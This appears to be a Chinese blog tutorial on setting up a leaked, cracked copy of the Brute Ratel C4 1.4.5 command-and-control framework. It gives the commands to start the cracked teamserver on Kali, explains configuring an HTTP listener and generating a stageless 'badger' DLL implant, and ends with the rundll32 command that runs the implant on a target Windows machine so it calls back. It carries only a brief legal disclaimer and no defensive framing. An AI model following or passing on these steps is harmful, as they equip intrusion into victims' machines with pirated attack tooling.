前言:
本文提供的BRC4 1.4.5由41group泄露,棉花糖未参与制作,使用此工具需遵守法律法规,一切后果由使用者本人承担。
简单使用教程:
以下操作除马子执行外,均在kali完成。
拿到压缩包,放到kali中解压,得到如下文件:
给brute-ratel-linx64_crack以及lib64/commander执行权限
chmod +x brute-ratel-linx64_crack
chmod +x lib64/commander
然后启动服务端:
./brute-ratel-linx64_crack -ratel -a admin -p password -h 127.0.0.1:50000 -sc cert.pem -sk key.pem
其中,账号密码端口等都可以自行修改
之后打开客户端,在kali图形界面找到brc4文件夹,执行命令:
chmod +x Rungui.sh
./Rungui.sh
输入你自定义的账号密码端口,点击猴子头像连接即可
接下来是生成马子并上线,本文只演示一种简单的配置,复杂的配置请自行研究
进入客户端后,点击C4 Profiler -> Add http Listener
按如下图示配置即可
需要注意的地方:listener name为监听名称,可自定义,第二行为选择监听地址,可点击选择你的ip,第三行为重定向地址,可点击右侧same按钮选择与监听地址一致,端口可自定义,URL栏据官方描述可随便乱填,ssl棉花糖个人建议选择no,因为测试中ssl选择yes无法成功上线,sleep和jitter类似于cs的延时时间,可调低,末尾最后一行勾选后,马子如果一次不上线,不会一直请求
配置好后点击save保存,即可得到一个监听器,右键此监听器,选择Stageless,即可生成对应架构的马子,棉花糖演示选择的是 X64 Arch (Default) -> Dll,生成的dll放到目标win中,cmd执行:
rundll32 .\badger_x64.dll,main
即可上线
扫一扫
796
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
